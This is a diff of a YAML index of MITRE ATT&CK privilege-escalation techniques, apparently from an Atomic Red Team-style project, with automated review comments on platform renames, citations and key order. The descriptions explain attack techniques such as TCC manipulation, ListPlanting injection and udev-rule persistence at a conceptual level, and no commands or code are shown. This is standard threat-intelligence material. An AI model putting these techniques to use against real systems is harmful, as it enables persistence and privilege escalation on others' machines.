technique:
@@ -25485,7 +25774,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -25505,7 +25793,7 @@ privilege-escalation:
name: bash
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -25602,7 +25890,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -25716,7 +26003,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -25786,7 +26072,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -25814,7 +26099,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -25858,8 +26143,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -25895,7 +26178,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -25914,7 +26197,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests:
- name: Copy in loginwindow.plist for Re-Opened Applications
@@ -26008,7 +26290,7 @@ privilege-escalation:
name: sh
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -26058,12 +26340,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -26096,9 +26377,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
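Review bot: the combined entry `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` is split into two contributors and moved to the end of the list, but the Gurucul affiliation is kept only on Nilesh Dherange; if both were credited under Gurucul the affiliation has been lost for Naveen Vijayaraghavan. Worth checking against the upstream T1098.002 object before merging, as the split is a content change, not a reformat.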
@@ -26115,9 +26397,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
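Review bot: two platform entries (`Office 365`, `Google Workspace`) collapse into a single `Office Suite` here, and the same rename appears for T1546 earlier in the patch; any per-platform index or filter built on the old names (a Google Workspace index in particular) will silently match nothing for T1098.002 after this change, so the platform-specific index files need to be regenerated in the same PR and the rename mentioned in the changelog. The version bump to 2.2 is consistent with the platform change.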
@@ -26163,38 +26444,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
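Review bot: the T1548.006 description switches from a double-quoted scalar ending in `\n` to a `|+` block scalar, and `|+` (keep chomping) makes the trailing blank line part of the value, so the description now ends in two newlines instead of one; unless the upstream text really ends with a blank line, `|` (clip) is the indicator that round-trips it exactly. Content-wise the rewrite also drops the closing sentence about injecting code into applications that already hold TCC permissions and folds Process Injection into the access paragraph instead, and it introduces the phrase "an overwrites file (if connected to an MDM)"; both should match the upstream ATT&CK text verbatim, which the version bump to 1.1 in the following hunk implies, so a quick diff against upstream is enough to sign off.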
@@ -26202,6 +26464,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -26209,7 +26473,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -26239,7 +26503,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -26285,7 +26548,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -26330,8 +26593,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -26357,7 +26618,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -26383,59 +26644,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
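Review bot: the rewritten description now cites `(Citation: Hexacorn Listplanting)`, a key with no matching `source_name` anywhere in this hunk, and at the same time the object's whole `external_references` block (mitre-attack, Microsoft List View Controls, Modexp Windows Process Injection, ESET InvisiMole June 2020) is deleted together with `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created` and `created_by_ref`. Those keys have to reappear further down the same object, with a `source_name: Hexacorn Listplanting` entry added, or every citation in the description dangles. Most of this hunk is key reordering rather than content change; a stable key order in the generator would keep future diffs down to the actual edits.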
@@ -26452,6 +26682,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -26466,21 +26699,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
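Review bot: `x_mitre_modified_by_ref` is deleted near the top of this hunk and re-added at the bottom with the same value, purely because of key order, which is noise a stable emitter would avoid. Otherwise the hunk restores the T1055.015 keys removed earlier in the diff, adds `revoked: false`, moves `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0 in step with `x_mitre_version: '1.1'`, and adds the `Hexacorn Listplanting` reference alongside the four existing ones, so every citation in the description resolves.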
@@ -26525,9 +26789,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
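Review bot: T1484's platform list loses both `Azure AD` and `SaaS` and gains only `Identity Provider`, so the technique's scope narrows from any SaaS application to identity providers specifically, with `x_mitre_version` moving 3.0 to 3.1 in step. If this mirrors the upstream ATT&CK platform consolidation it is fine, but dropping `SaaS` is a substantive scoping change rather than a rename, so it is worth confirming against the upstream object.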
@@ -26584,8 +26847,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -26594,7 +26857,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -26636,7 +26898,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -26661,12 +26923,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -26706,8 +26967,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -26715,13 +26978,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
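Review bot: `Azure AD`, `Office 365` and `Google Workspace` are removed from T1078.004's platforms and `Office Suite` and `Identity Provider` take their place, while `SaaS` and `IaaS` stay. Anything downstream that selects techniques by the old platform strings (platform-specific indexes, filters, dashboards) will stop matching this technique until it is updated to the new names; check that every per-platform artifact produced from this index is regenerated with the same naming.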
@@ -26752,17 +27015,14 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
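Review bot: the sentence added to T1053.002's description cites `(Citation: Malicious Life by Cybereason)`; citation keys are matched literally against `source_name`, so the object's `external_references` must gain an entry with exactly that name (this diff does add `- source_name: Malicious Life by Cybereason` further down). The deletions of `x_mitre_attack_spec_version`, `x_mitre_modified_by_ref` and `spec_version` at the top of this hunk are the same key relocation seen for the other objects, with the first two re-emitted earlier in the T1078.004 object.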
@@ -26825,7 +27085,7 @@ privilege-escalation:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -26859,8 +27119,8 @@ privilege-escalation:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
@@ -26869,6 +27129,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
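Review bot: the new `Malicious Life by Cybereason` reference URL ends in `#blog-subscribe`, which is the anchor of the page's subscription widget rather than the article, so a reader following the link lands on a signup box. Since the reference text is mirrored from upstream ATT&CK it should stay verbatim here, but the fragment is worth reporting upstream so the citation points at the article body.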
@@ -26881,7 +27145,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
T1055.001:
@@ -26984,9 +27247,67 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
